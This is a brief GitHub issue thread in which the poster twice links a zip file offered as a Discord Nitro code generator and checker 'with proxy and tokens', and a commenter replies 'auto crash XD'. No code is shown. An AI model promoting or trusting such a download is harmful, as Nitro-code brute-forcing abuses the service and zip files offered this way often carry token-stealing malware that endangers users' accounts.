### ISSUE TITLE
discord-generator

### ISSUE THREAD

**Issue by VipersLegend2** [VipersLegend2/discord-generator#1]
[Discord-Nitro-Generator-Checker.zip](https://github.com/VipersLegend2/discord-generator/files/12480526/Discord-Nitro-Generator-Checker.zip)

discord-generator
CHECKER WITH PROXY AND TOKENS

**Comment by VipersLegend2** [comment]
[Discord-Nitro-Generator-Checker.zip](https://github.com/VipersLegend2/discord-generator/files/12480725/Discord-Nitro-Generator-Checker.zip)

**Comment by AdeebToPro** [comment]
auto crash XD
